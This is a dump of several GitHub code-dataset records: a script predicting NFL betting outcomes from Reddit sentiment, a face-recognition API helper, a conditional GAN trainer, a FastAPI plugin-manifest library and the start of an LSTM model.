game_spread + spread == 0:\n        df = df.drop([i], axis=0) # REMOVE PUSH\n        continue\n    else:\n        df['home_wts'][i] = 0\n\n    # determine over-under outcome\n    ou = df['over_under_line'][i]\n    game_ou = df['score_home'][i]+df['score_away'][i]\n    if game_ou > ou: # total went over the line\n        df['above_ou'][i] = 1\n    elif game_ou == ou:\n        df = df.drop([i], axis=0) # REMOVE PUSH\n        continue\n    else:\n        df['above_ou'][i] = 0 \n    \n    print(i)\n\n    # home team\n    string = \"\"\n    for thisdict in df['home_comments'][i]:\n        if thisdict[\"body\"] is None:\n            continue\n        string = string + thisdict[\"body\"] + \" \"\n    string = preprocess(string)\n    home_corpus.append(string)\n    if len(string) == 0:\n        home_vader.append([0,0,0,0])\n    else:\n        score = analyzer.polarity_scores(string)\n        num_words = len(string.split())\n        home_vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n    home_afinn.append(afinn_analyzer.score(string))\n\n    # away team\n    string = \"\"\n    for thisdict in df['away_comments'][i]:\n        if thisdict[\"body\"] is None:\n            continue\n        string = string + thisdict[\"body\"] + \" \"\n    string = preprocess(string)\n    away_corpus.append(string)\n    if len(string) == 0:\n        away_vader.append([0,0,0,0])\n    else:\n        score = analyzer.polarity_scores(string)\n        num_words = len(string.split())\n        away_vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n    away_afinn.append(afinn_analyzer.score(string))\n\n# create bag-of-words + TF-IDF transformations\nhome_counts = vectorizer.fit_transform(home_corpus).toarray()\nhome_tfidf = transformer.fit_transform(home_counts).toarray()\naway_counts = vectorizer.fit_transform(away_corpus).toarray()\naway_tfidf = transformer.fit_transform(away_counts).toarray()\n\n# create feature matrices\ncounts = []\ntfidf = []\nvader = []\nafinn = []\nfor i in range(home_counts.shape[0]):\n    counts.append(np.concatenate((home_counts[i], away_counts[i])))\n    tfidf.append(np.concatenate((home_tfidf[i], away_tfidf[i])))\n    vader.append(np.concatenate((home_vader[i], away_vader[i])))\n    afinn.append([home_afinn[i], away_afinn[i]])\ncounts = np.matrix(counts)\ntfidf = np.matrix(tfidf)\nvader = np.matrix(vader)\nafinn = np.matrix(afinn)\ny = np.array(df['home_wts']).astype(str).astype(int)\n#y = 
np.array(df['above_ou']).astype(str).astype(int)\n\n# perform k-fold validation (k=5) 100 times\ndef perform_kfold(model, X, y):\n train_score = []\n test_score = []\n for i in range(100):\n kf = KFold(n_splits=5)\n this_train_score = 0\n this_test_score = 0\n for train_index, test_index in kf.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n model.fit(X_train, y_train)\n this_train_score = this_train_score + accuracy_score(y_train, model.predict(X_train))\n this_test_score = this_test_score + accuracy_score(y_test, model.predict(X_test))\n #if sum(model.predict(X_test)) == len(model.predict(X_test)):\n # print(\"SINGLE CLASSIFICATION\")\n train_score.append(this_train_score/5)\n test_score.append(this_test_score/5)\n return np.mean(train_score), np.mean(test_score), np.var(train_score), np.var(test_score)\n\n\n# determine principal components to use (COUNTS)\npca = PCA().fit(counts)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for Counts Matrix ('+file_name+')')\nplt.show()\n\n# determine principal components to use (TFIDF)\npca = PCA().fit(tfidf)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for TFIDF Matrix ('+file_name+')')\nplt.show()\n\n\n\"\"\" TESTING MODELS \"\"\"\n\nfor X in [PCA(n_components=50).fit_transform(counts), PCA(n_components=1500).fit_transform(tfidf), vader, afinn]:\n print(X.shape)\n # Gaussian Naive Bayes\n model = GaussianNB()\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"GNB (train): \", train_score)\n print(\"GNB: \", test_score,\"(\", test_var,\")\")\n\n # Random Forest\n for d in [2, 4]:\n model = RandomForestClassifier(n_estimators=100, max_depth=d)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Random Forest (train): \", train_score)\n print(\"Random Forest: \", test_score,\"(\", test_var,\")\")\n\n # Linear SVC\n for C in [10**-3, 10**-2, 10**-1, 1, 10, 100]:\n model = LinearSVC(C=C)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Linear SVC (train) C = \", C, \": \", train_score)\n print(\"Linear SVC C =\", C, \": \", test_score,\"(\", test_var,\")\")\n\n # Logistic Regression\n for C in [10**-3, 10**-2, 10**-1, 1, 10, 100]:\n model = LogisticRegression(C=C)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Logistic (train) C = \", C, \": \", train_score)\n print(\"Logistic C =\", C, \": \", test_score,\"(\", test_var,\")\")\n\n # K-Nearest Neighbors\n for k in [1, 3, 5, 10]:\n model = KNeighborsClassifier(n_neighbors=k)\n train_score, test_score, train_var, test_var = perform_kfold(model, X, y)\n #print(\"Random Forest (train): \", train_score)\n print(\"K Nearest Neighbors K =\", k, \": \", test_score,\"(\", test_var,\")\")\n\n\n\"\"\" NEURAL NETWORKS \"\"\"\n\n# start a new dataframe\ndf = pd.read_csv(DATA_PATH)\ndf['schedule_date'] = pd.to_datetime(df['schedule_date'])\ndf['home_wts'] = \"\"\nfor delta in range(30):\n df['home_submissions_'+str(delta)] = \"\"\n 
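# hypothetical tidier equivalent (sketch only, same column names as this script):\n    #   for side in ('home', 'away'):\n    #       for kind in ('submissions', 'comments'):\n    #           df[side + '_' + kind + '_' + str(delta)] = \"\"\n    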
df['away_submissions_'+str(delta)] = \"\"\n    df['home_comments_'+str(delta)] = \"\"\n    df['away_comments_'+str(delta)] = \"\"\n\n# scrape relevant text for each game from Reddit (30 day window)\nfor i, row in df.iterrows():\n    date = df['schedule_date'][i]\n\n    home = team_dict1[df['team_home'][i]]\n    away = team_dict1[df['team_away'][i]]\n    year = date.year\n    \n    # rams city change\n    if year < 2016 and df['team_favorite_id'][i] == \"LAR\":\n        df['team_favorite_id'][i] = \"RAM\"\n    \n    print(\"Processing row \", i, \":\", home, \" @ \", away, date)\n\n    for delta in range(30):\n        print(delta)\n        df['home_submissions_'+str(delta)][i] = sub_query(home, date - datetime.timedelta(days=delta+1), date - datetime.timedelta(days=delta))\n        df['home_comments_'+str(delta)][i] = com_query(home, date - datetime.timedelta(days=delta+1), date - datetime.timedelta(days=delta))\n        df['away_submissions_'+str(delta)][i] = sub_query(away, date - datetime.timedelta(days=delta+1), date - datetime.timedelta(days=delta))\n        df['away_comments_'+str(delta)][i] = com_query(away, date - datetime.timedelta(days=delta+1), date - datetime.timedelta(days=delta))\n\ndf.to_pickle('dataNN')\ndf = pd.read_pickle('dataNN')\n\n\"\"\" FEATURE ENGINEERING FOR NEURAL NETWORKS \"\"\"\n\ncorpus = []\nvader = []\nafinn = []\ndf['home_wts'] = '' # 1 for home team wins the spread, 0 for away\ndf['above_ou'] = '' # 1 for above, 0 for under\n\n# extract features from scraped text\nfor i, row in df.iterrows():\n    # drop games with no comments at all in the 30-day window for either team\n    if (all(len(df['home_comments_'+str(d)][i]) == 0 for d in range(30))\n            or all(len(df['away_comments_'+str(d)][i]) == 0 for d in range(30))):\n        df = df.drop([i], axis=0)\n        continue\n\n    home = team_dict1[df['team_home'][i]]\n    away = team_dict1[df['team_away'][i]]\n\n    # determine WTS outcome\n    spread = df['spread_favorite'][i]\n    if df['team_favorite_id'][i] != 'PICK':\n        favored = team_dict2[df['team_favorite_id'][i]]\n        # calculate point spread\n        if away == favored:\n            spread = -1*spread # away team is favored\n    game_spread = df['score_home'][i]-df['score_away'][i]\n    if game_spread + spread > 0:\n        df['home_wts'][i] = 1 # home team covered the spread\n    elif game_spread + spread == 0:\n        df = df.drop([i], axis=0) # REMOVE PUSH\n        continue\n    else:\n        df['home_wts'][i] = 0\n\n    # determine over-under outcome\n    ou = df['over_under_line'][i]\n    game_ou = df['score_home'][i]+df['score_away'][i]\n    if game_ou > ou: # total went over the line\n        df['above_ou'][i] = 1\n    elif game_ou == ou:\n        df = df.drop([i], axis=0) # REMOVE PUSH\n        continue\n    else:\n        df['above_ou'][i] = 0 \n    \n    print(i)\n\n    # home team\n    for delta in range(30):\n        string = \"\"\n        for thisdict in df['home_comments_'+str(delta)][i]:\n            if thisdict[\"body\"] is None:\n                continue\n            string = string + thisdict[\"body\"] + \" \"\n        string = preprocess(string)\n        corpus.append(string)\n\n        if len(string) == 0:\n            vader.append([0,0,0,0])\n        else:\n            score = analyzer.polarity_scores(string)\n            num_words = len(string.split())\n            vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n        afinn.append(afinn_analyzer.score(string))\n\n    # away team\n    for delta in range(30): \n        string = \"\"\n        for thisdict in df['away_comments_'+str(delta)][i]:\n            if thisdict[\"body\"] is None:\n                continue\n            string = string + thisdict[\"body\"] + \" \"\n        string = preprocess(string)\n        corpus.append(string)\n        if len(string) == 0:\n            vader.append([0,0,0,0])\n        else:\n            score = analyzer.polarity_scores(string)\n            num_words = len(string.split())\n            vader.append([score['pos'], score['neu'], score['neg'], score['compound']])\n        afinn.append(afinn_analyzer.score(string))\n    \n# create bag-of-words + TF-IDF transformations\ncounts = vectorizer.fit_transform(corpus)\ntfidf = transformer.fit_transform(counts)\n\n# create feature matrices\ntemp_counts = []\ntemp_tfidf = []\ntemp_vader = []\ntemp_afinn = []\nfor i in range(int((counts.shape[0])/60)):\n    temp_counts.append(np.matrix(counts[i*60:i*60+60]))\n    temp_tfidf.append(np.matrix(tfidf[i*60:i*60+60]))\n    temp_vader.append(np.matrix(vader[i*60:i*60+60]))\n    temp_afinn.append(np.matrix(afinn[i*60:i*60+60]).T)\ncounts = temp_counts\ntfidf = temp_tfidf\nvader = temp_vader\nafinn = temp_afinn\ny = np.array(df['home_wts']).astype(str).astype(int)\ny = np.matrix(y).T\n\n# caution: counts/tfidf are now lists of per-game matrices, so PCA().fit(counts) below will not run as-is\n# determine principal components to use (COUNTS)\npca = PCA().fit(counts)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for Counts Matrix ('+file_name+')')\nplt.show()\n\n# determine principal components to use (TFIDF)\npca = PCA().fit(tfidf)\n# plot cumulative sum of explained variance\nplt.figure()\nplt.plot(np.cumsum(pca.explained_variance_ratio_))\nplt.axhline(y=0.9, color='r', 
linestyle='-')\nplt.xlabel('Number of Components')\nplt.ylabel('Variance (%)') #for each component\nplt.title('Explained Variance for TFIDF Matrix ('+file_name+')')\nplt.show()\n\n# perform PCA (bag-of-words)\npca = TruncatedSVD(20)\npca.fit((sum(counts)/len(counts))[0,0])\nX_counts = []\nfor i in range(len(counts)):\n X_counts.append(np.matrix(pca.transform(counts[i][0,0])))\nX_counts = np.array(X_counts)\n\n# perform PCA (TF-IDF)\npca = TruncatedSVD(50)\npca.fit((sum(tfidf)/len(tfidf))[0,0])\nX_tfidf = []\nfor i in range(len(tfidf)):\n X_tfidf.append(np.matrix(pca.transform(tfidf[i][0,0])))\nX_tfidf = np.array(X_tfidf)\n\nX_vader = np.array(vader)\nX_afinn = np.array(afinn)\n\n\"\"\" TESTING NEURAL NETWORKS \"\"\"\nbatch_size = 5\nfor X in [X_counts, X_tfidf, X_vader, X_afinn]:\n print(X[0].shape)\n row, col = X[0].shape\n for neurons in [20, 40]:\n print(neurons, \" neurons\")\n\n # LSTM 1-layer Network\n def build_model_1():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col)))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_1, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 1: \", test_score,\"(\", test_var,\")\")\n\n # LSTM/feedforward 2-layer Network\n def build_model_2():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col)))\n model.add(Dense(neurons, activation='relu'))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_2, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 2: \", test_score,\"(\", test_var,\")\")\n\n # LSTM 2-layer Network\n def build_model_3():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col),return_sequences = True))\n model.add(LSTM(neurons))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_3, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 3: \", test_score,\"(\", test_var,\")\")\n\n # LSTM 3-layer Network\n def build_model_4():\n model = Sequential()\n model.add(LSTM(neurons, input_shape=(60,col),return_sequences = True))\n model.add(LSTM(neurons,return_sequences = True))\n model.add(LSTM(neurons))\n model.add(Dense(1, kernel_initializer='normal', activation='sigmoid'))\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n # evaluate\n model = KerasClassifier(build_fn=build_model_4, epochs=100, batch_size=batch_size, verbose=0)\n test_score, test_var = perform_kfold(model, X, y)\n print(\"Config 4: \", test_score,\"(\", test_var,\")\")\n","repo_name":"peterxichen/nfl-reddit-sentiment","sub_path":"presentation/presentation_code.py","file_name":"presentation_code.py","file_ext":"py","file_size_in_byte":25493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"42824690824","text":"#!/usr/bin/env python\n# -=-<[ Bismillahirrahmanirrahim ]>-=-\n# -*- coding: utf-8 -*-\n# @Date 
: 2021-07-20 15:10:26\n# @Author : Dahir Muhammad Dahir\n# @Description : something cool\n\n\nfrom app.utils.db import list_models_and_filter_by_equality\nfrom app.dependencies.dependencies import get_recognition_auth_token\nfrom fastapi import UploadFile\nfrom app.utils.misc import requester\nfrom sqlalchemy.orm.session import Session\n\nfrom typing import Any, List\nfrom os import getenv\nimport requests\n\n\ndef remote_search_faces(face_image: UploadFile, token: str) -> requests.Response:\n face_image.file.seek(0)\n payload = {\"collection_id\": getenv(\"RECOGNITION_COLLECTION\", default=\"\"), \\\n \"threshold\": int(getenv(\"FACE_MATCH_THRESHOLD\", default=99)), \"max_faces\": int(getenv(\"MAX_FACE_MATCHES\", 1))}\n \n files = {\"image_file\": face_image.file.read()}\n \n headers = {\"Authorization\": f\"Bearer {token}\"}\n \n return requester(\n getenv(\"FACE_SEARCH_URL\", \"\"),\n method=\"post\",\n files=files,\n data=payload,\n headers=headers\n )\n\n\ndef remote_index_face(face_image_url: str, face_id: str, token: str) -> requests.Response:\n payload = {\"CollectionId\": getenv(\"RECOGNITION_COLLECTION\", default=\"\"), \\\n \"ExternalImageId\": str(face_id), \"ImagesURL\": [face_image_url]}\n \n url = getenv(\"FACE_INDEX_URL\", \"\")\n headers = {\"Authorization\": f\"Bearer {token}\"}\n\n return requester(\n url,\n method=\"post\",\n json=payload,\n headers=headers\n )\n\n\ndef remote_detect_faces(face_image: UploadFile, token: str) -> requests.Response:\n face_image.file.seek(0)\n files = {\"image_file\": face_image.file.read()}\n \n headers = {\"Authorization\": f\"Bearer {token}\"}\n \n return requester(\n getenv(\"FACE_DETECT_URL\", \"\"),\n method=\"post\",\n files=files,\n headers=headers\n )\n\n\ndef index_account_model(model_list: List[Any]):\n for model in model_list:\n face_image_url: str = model.nin_info.image\n user_id: str = model.user_id\n index_face_to_collection(face_image_url, user_id)\n\n\ndef re_index_model(db: Session, model: Any, model_name: str, count_col: str):\n db_model_record = list_models_and_filter_by_equality(\n db, \n model,\n {},\n model_name,\n count_by_column=count_col\n )\n\n count = int(db_model_record[\"count\"])\n model_list: List[Any] = db_model_record[\"result\"]\n\n if count % 100:\n rounds = (count // 100) + 1\n else:\n rounds = (count // 100)\n \n for i in range(1, rounds + 1):\n index_account_model(model_list)\n\n db_model_record = list_models_and_filter_by_equality(\n db, \n model,\n {},\n model_name,\n skip= i * 100,\n count_by_column=count_col\n )\n\n model_list = db_model_record[\"result\"]\n\n\ndef index_face_to_collection(face_image_url: str, face_id: str):\n try:\n token: str = get_recognition_auth_token()\n remote_index_face(face_image_url, face_id, token)\n except:\n pass\n\n\ndef detect_single_face(image: UploadFile, token: str):\n return remote_detect_faces(image, token).json()\n\n","repo_name":"alhytham-tech/cloud_controller","sub_path":"app/utils/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"29273649136","text":"import os\n\nimport numpy as np\nimport torch\nimport torchvision.utils as vutils\nfrom datetime import datetime\n\nfrom discriminator import Discriminator\nfrom generator import Generator\nfrom utils import to_np\n\n\nclass Model(object):\n def __init__(self, name, device, data_loader, classes, channels, img_size, latent_dim):\n self.name = name\n self.device = 
device\n self.data_loader = data_loader\n self.classes = classes\n self.channels = channels\n self.img_size = img_size\n self.latent_dim = latent_dim\n\n if self.name == 'cgan':\n self.netG = Generator(self.classes, self.channels, self.img_size, self.latent_dim)\n self.netG.to(device)\n\n if self.name == 'cgan':\n self.netD = Discriminator(self.classes, self.channels, self.img_size, self.latent_dim)\n self.netD.to(device)\n\n self.optim_G = None\n self.optim_D = None\n\n def create_optim(self, lr, alpha=0.5, beta=0.999):\n self.optim_G = torch.optim.Adam(filter(lambda p: p.requires_grad, self.netG.parameters()), lr=lr, betas=(alpha, beta))\n self.optim_D = torch.optim.Adam(filter(lambda p: p.requires_grad, self.netD.parameters()), lr=lr, betas=(alpha, beta))\n\n def train(self, epochs, log_interval=100, out_dir='', verbose=True):\n self.netG.train()\n self.netD.train()\n viz_noise = torch.randn(self.data_loader.batch_size, self.latent_dim, device=self.device)\n nrows = self.data_loader.batch_size // 8\n viz_label = torch.LongTensor(np.array([num for _ in range(nrows) for num in range(8)])).to(self.device)\n for epoch in range(epochs):\n for batch_idx, (data, target) in enumerate(self.data_loader):\n data, target = data.to(self.device), target.to(self.device)\n batch_size = data.size(0)\n real_label = torch.full((batch_size, 1), 1., device=self.device)\n fake_label = torch.full((batch_size, 1), 0., device=self.device)\n\n self.netG.zero_grad()\n z_noise = torch.randn(batch_size, self.latent_dim, device=self.device)\n x_fake_labels = torch.randint(0, self.classes, (batch_size,), device=self.device)\n x_fake = self.netG(z_noise, x_fake_labels)\n y_fake_g = self.netD(x_fake, x_fake_labels)\n g_loss = self.netD.loss(y_fake_g, real_label)\n g_loss.backward()\n self.optim_G.step()\n\n self.netD.zero_grad()\n y_real = self.netD(data, target)\n d_real_loss = self.netD.loss(y_real, real_label)\n\n y_fake_d = self.netD(x_fake.detach(), x_fake_labels)\n d_fake_loss = self.netD.loss(y_fake_d, fake_label)\n\n d_loss = (d_real_loss + d_fake_loss) / 2\n d_loss.backward()\n self.optim_D.step()\n\n if verbose and batch_idx % log_interval == 0 and batch_idx > 0:\n print('Epoch {} [{}/{}] loss_D: {:.4f} loss_G: {:.4f}'.format(\n epoch, batch_idx, len(self.data_loader),\n d_loss.mean().item(),\n g_loss.mean().item(),)\n )\n vutils.save_image(data, os.path.join(out_dir, 'real_samples.png'), normalize=True)\n with torch.no_grad():\n viz_sample = self.netG(viz_noise, viz_label)\n vutils.save_image(viz_sample, os.path.join(out_dir, 'fake_samples_{}.png'.format(epoch)), nrow=8, normalize=True)\n\n self.save_to(path=out_dir, name=self.name, verbose=False)\n\n def eval(self, mode=None, batch_size=None):\n self.netG.eval()\n self.netD.eval()\n if batch_size is None:\n batch_size = self.data_loader.batch_size\n nrows = batch_size // 8\n viz_labels = np.array([num for _ in range(nrows) for num in range(8)])\n viz_labels = torch.LongTensor(viz_labels).to(self.device)\n\n with torch.no_grad():\n viz_tensor = torch.randn(batch_size, self.latent_dim, 1, 1, device=self.device)\n viz_sample = self.netG(viz_tensor, viz_labels)\n\n viz_vector = to_np(viz_tensor).reshape(batch_size, self.latent_dim)\n cur_time = datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n np.savetxt('vec_{}.txt'.format(cur_time), viz_vector)\n vutils.save_image(viz_sample, 'img_{}.png'.format(cur_time), nrow=8, normalize=True)\n\n def save_to(self, path='', name=None, verbose=True):\n if name is None:\n name = self.name\n\n if verbose:\n print('\\nSaving models 
to {}_G.pt and {}_D.pt ...'.format(name, name))\n torch.save(self.netG.state_dict(), os.path.join(path, '{}_G.pt'.format(name)))\n torch.save(self.netD.state_dict(), os.path.join(path, '{}_D.pt'.format(name)))\n\n def load_from(self, path='', name=None, verbose=True):\n if name is None:\n name = self.name\n if verbose:\n print('\\nLoading models from {}_G.pt and {}_D.pt ...'.format(name, name))\n ckpt_G = torch.load(os.path.join(path, '{}_G.pt'.format(name)))\n if isinstance(ckpt_G, dict) and 'state_dict' in ckpt_G:\n self.netG.load_state_dict(ckpt_G['state_dict'], strict=True)\n else:\n self.netG.load_state_dict(ckpt_G, strict=True)\n ckpt_D = torch.load(os.path.join(path, '{}_D.pt'.format(name)))\n if isinstance(ckpt_D, dict) and 'state_dict' in ckpt_D:\n self.netD.load_state_dict(ckpt_D['state_dict'], strict=True)\n else:\n self.netD.load_state_dict(ckpt_D, strict=True)\n\n\n\n\n\n\n","repo_name":"nkrokhmal/gans","sub_path":"cgan/build_gan.py","file_name":"build_gan.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11187272742","text":"from applogging import Log\nfrom core import AppConfig, OsExpert, NetworkExpert\nfrom pathlib import Path\nimport os\nimport logging\n\t\nclass App():\n\tdef __init__(self, appFilepath, isToNotifyStartup = True):\n\t\tprint('App start: {}'.format(appFilepath))\n\t\tfile_dirpath = OsExpert.path_backstep(appFilepath)\n\t\tparent_dirpath = OsExpert.path_backstep(file_dirpath)\n\t\tApp.initialize_in_dirs(logconfig_dirpath=file_dirpath, appconfig_dirpath=parent_dirpath)\n\t\tif isToNotifyStartup is True:\n\t\t\tNetworkExpert.tryAppNotifyByEmail(appFilepath, 'service is starting')\t\n\t@staticmethod\n\tdef initialize_in_dir(dirpath):\n\t\tApp.initialize_in_dirs(dirpath, dirpath)\n\t@staticmethod\n\tdef initialize_in_dirs(appconfig_dirpath, logconfig_dirpath):\n\t\tOsExpert.ensure_abs_dirpath_exists(appconfig_dirpath)\n\t\tOsExpert.ensure_abs_dirpath_exists(logconfig_dirpath)\n\t\tApp.initialize(\n\t\t\tappconfig_filepath = os.path.join(appconfig_dirpath, 'config.ini'), \n\t\t\tlogconfig_filepath = os.path.join(logconfig_dirpath, 'logconfig.json')\n\t\t\t)\n\t@staticmethod\n\tdef initialize(appconfig_filepath, logconfig_filepath):\n\t\tOsExpert.ensure_abs_filepath_exists(appconfig_filepath)\n\t\tLog.initialize(logconfig_filepath)\n\t\tAppConfig.initialize(appconfig_filepath) \n","repo_name":"runestate/cryptrade","sub_path":"src/python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28460015509","text":"import os\nimport stat\nfrom typing import Optional\n\nfrom fastapi import FastAPI\nfrom fastapi.encoders import jsonable_encoder\nfrom starlette.requests import Request\nfrom starlette.responses import FileResponse, JSONResponse, guess_type\n\nfrom fastlmi import ai_plugin\nfrom fastlmi.auth import LMIAuth\nfrom fastlmi.typing import PathLike\n\n\nclass FastLMI(FastAPI):\n def __init__(\n self,\n *,\n title: str,\n description: str,\n name_for_model: Optional[str] = None,\n description_for_model: Optional[str] = None,\n logo_url: Optional[str] = None,\n contact_email: str = \"\",\n legal_url: str = \"\",\n ai_plugin_manifest_url: Optional[str] = \"/.well-known/ai-plugin.json\",\n auth: Optional[LMIAuth] = None,\n **kwargs,\n ):\n \"\"\"\n :param title: Human-readable name of the application\n :param description: Human-readable 
description of the application\n :param name_for_model: Name the model will use to target the plugin (no spaces allowed, only letters and\n numbers)\n :param description_for_model: Description better tailored to the model, such as token context length\n considerations or keyword usage for improved plugin prompting\n :param logo_url: URL the logo image is hosted at (can be relative to root or external URL) - also\n see :meth:`serve_local_logo`\n :param contact_email: Email contact for safety/moderation, support, and deactivation\n :param legal_url: Redirect URL for users to view the application's legal information (e.g. Terms of Service)\n :param ai_plugin_manifest_url: The path to expose the AI plugin (OpenAI) manifest at\n :param auth: The authentication scheme to expose in the LMI manifest(s)\n :param kwargs: Extra options to pass to FastAPI\n \"\"\"\n self.name_for_model = name_for_model or title\n self.description_for_model = description_for_model or description\n self.contact_email = contact_email\n self.legal_url = legal_url\n self.logo_url = logo_url\n self.ai_plugin_manifest_url = ai_plugin_manifest_url\n self.auth = auth\n # pass some reasonable defaults on to FastAPI\n if legal_url:\n kwargs.setdefault(\"terms_of_service\", legal_url)\n if contact_email:\n kwargs.setdefault(\"contact\", {\"email\": contact_email})\n super().__init__(title=title, description=description, **kwargs)\n\n def setup(self) -> None:\n super().setup()\n if self.openapi_url and self.ai_plugin_manifest_url:\n self.add_route(self.ai_plugin_manifest_url, self.ai_plugin_manifest, include_in_schema=False)\n\n def ai_plugin_manifest(self, req: Request) -> JSONResponse:\n # see https://platform.openai.com/docs/plugins/getting-started/plugin-manifest\n # :///?#\n # rewrite path to root_path, then tack on the relative urls to point to the right endpoints\n components = req.url.components\n scheme = components.scheme\n netloc = components.netloc\n root_path = req.scope.get(\"root_path\", \"\")\n root_url = f\"{scheme}://{netloc}/{root_path}\".rstrip(\"/\")\n openapi_url = root_url + self.openapi_url\n if self.logo_url and self.logo_url.startswith(\"/\"):\n logo_url = root_url + self.logo_url\n else:\n logo_url = self.logo_url or \"https://public.mechanus.zhu.codes/fastlmi_logo.png\"\n ai_plugin_auth = self.auth.ai_plugin() if self.auth else ai_plugin.ManifestNoAuth()\n return JSONResponse(\n jsonable_encoder(\n ai_plugin.PluginManifest(\n schema_version=\"v1\",\n name_for_human=self.title,\n name_for_model=self.name_for_model,\n description_for_human=self.description,\n description_for_model=self.description_for_model,\n auth=ai_plugin_auth,\n api=ai_plugin.ApiSpec.openapi(openapi_url),\n logo_url=logo_url,\n contact_email=self.contact_email,\n legal_info_url=self.legal_url,\n )\n )\n )\n\n def serve_local_logo(self, path: PathLike, url: str = \"/logo\", **kwargs):\n \"\"\"\n Serve the static image file located at `path` at the route specified by `url`.\n\n Extra `**kwargs` are passed to :cls:`starlette.FileResponse`.\n \"\"\"\n self.logo_url = url\n # we can take advantage of caching by stat()ing the file; this assumes that the logo file never changes\n # if it does for some reason, pass `stat_result=None` as a kwarg to recalculate headers on each request\n if \"stat_result\" not in kwargs:\n try:\n stat_result = os.stat(path)\n except FileNotFoundError:\n raise\n else:\n mode = stat_result.st_mode\n if not stat.S_ISREG(mode):\n raise ValueError(f\"File at path {path} is not a file.\")\n kwargs[\"stat_result\"] = 
stat_result\n if \"media_type\" not in kwargs:\n kwargs[\"media_type\"] = guess_type(path)[0] or \"image/png\"\n\n def _local_serve(req: Request) -> FileResponse:\n # we pass the method along from the req so that it can skip reading the file body on HEAD requests\n return FileResponse(path, method=req.method, **kwargs)\n\n self.add_route(self.logo_url, _local_serve, include_in_schema=False)\n","repo_name":"zhudotexe/fastlmi","sub_path":"fastlmi/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"10436902617","text":"import torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torch.nn import functional as F\nfrom torch.utils.data import Dataset, DataLoader\n\nimport pytorch_lightning as pl\nfrom pytorch_lightning.core.lightning import LightningModule\nfrom pytorch_lightning import seed_everything, LightningModule, Trainer\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom pytorch_lightning.metrics import Precision, Recall, Accuracy\n\nfrom argparse import ArgumentParser\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# weights gewichten von labels\n# gradienten visualisieren\n# tensorboard logger\n# accuracy\n# AUC\n\nclass ParkinsonLSTM(LightningModule):\n def __init__(self, seq_len, max_batch_len, learning_rate, **kwargs):\n super().__init__()\n self.n_features = 12\n self.hidden_size = 256\n self.num_layers = 5\n self.dropout = 0.5\n self.seq_len = seq_len\n self.max_batch_size = max_batch_len\n self.criterion = torch.nn.BCELoss()\n self.learning_rate = learning_rate\n self.batch_size = int(self.max_batch_size / self.seq_len)\n \n self.output_size = 1\n self.fc_size_1 = 50\n self.fc_size_2 = 10\n\n self.lstm = nn.LSTM(input_size = self.n_features, \n hidden_size = self.hidden_size,\n num_layers = self.num_layers, \n dropout = self.dropout, \n batch_first = True)\n \n self.activation = nn.LeakyReLU() \n self.fc1 = nn.Linear(self.hidden_size, self.fc_size_1)\n self.fc2 = nn.Linear(self.fc_size_1, self.fc_size_2)\n self.fc3 = nn.Linear(self.fc_size_2, self.output_size)\n\n self.sigmoid = nn.Sigmoid()\n \n self.save_hyperparameters()\n self.accuracy = Accuracy()\n #self.roc = 